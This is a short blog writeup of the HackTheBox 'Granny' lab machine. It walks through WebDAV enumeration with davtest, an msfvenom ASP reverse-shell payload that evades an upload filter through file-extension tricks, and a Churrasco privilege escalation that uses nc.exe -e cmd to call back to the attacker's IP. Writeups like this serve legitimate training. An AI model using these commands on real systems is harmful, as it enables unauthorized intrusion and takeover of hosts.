Post

Granny Writeup - HackTheBox

Posted
By kaenne 2 min read

NMAP

Hello, welcome to the Granny Writeup from HackTheBox.

Enumeration

NMAP Open ports

In first step, we are going to enumerate the list of open ports with NMAP.

NMAP1 NMAP2

Port 80: HTTP
Nmap scan report that webdav can use PUT and MOVE methods, so we are going to test it with Davtest.

Davtest

With Davtest, we can test the posibility of uploading and execute files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

davtest -url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: l8Qkwc
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_l8Qkwc
********************************************************
 Sending test files
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT     asp     FAIL
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT     cgi     FAIL
PUT     aspx    FAIL
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT     shtml   FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
EXEC    jsp     FAIL
EXEC    php     FAIL
EXEC    pl      FAIL
EXEC    cfm     FAIL
EXEC    jhtml   FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_l8Qkwc
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html

Exploitation

As we can see in the above image, we can execute the following extensions: Example.txt, Example.html and we can upload many extensions but we are going to use .asp.

1

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=443 -f asp > ennove.asp.txt

So, in this case we use .asp.txt to bypass the upload

We can use Cadaver to upload and change the name in this case to bypass and run the exploit:

1

cadaver 10.10.10.15

cadaver

We can execute the exploit visiting http://10.10.10.15/ennove.asp;.txt and use netcat to listen the reverse shell
After whoami we list some privileges, we found SeImpersonatePrivilege Whoami

Privilege Escalation

Shell as nt authority/system

We are going to work in Temp folder and with impacketsmb-server we are going to move to the victim machine Churrasco.exe GitHub.

1

impacket-smbserver smbFolder .

And using nc.exe(Netcat) we are going to send a connection to our attacker machine with a cmd:

1

churrasco.exe "\\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4445"

Reverse

Writeup, HackTheBox
windows easy
This post is licensed under CC BY 4.0 by the author.

Trending Tags

easy linux windows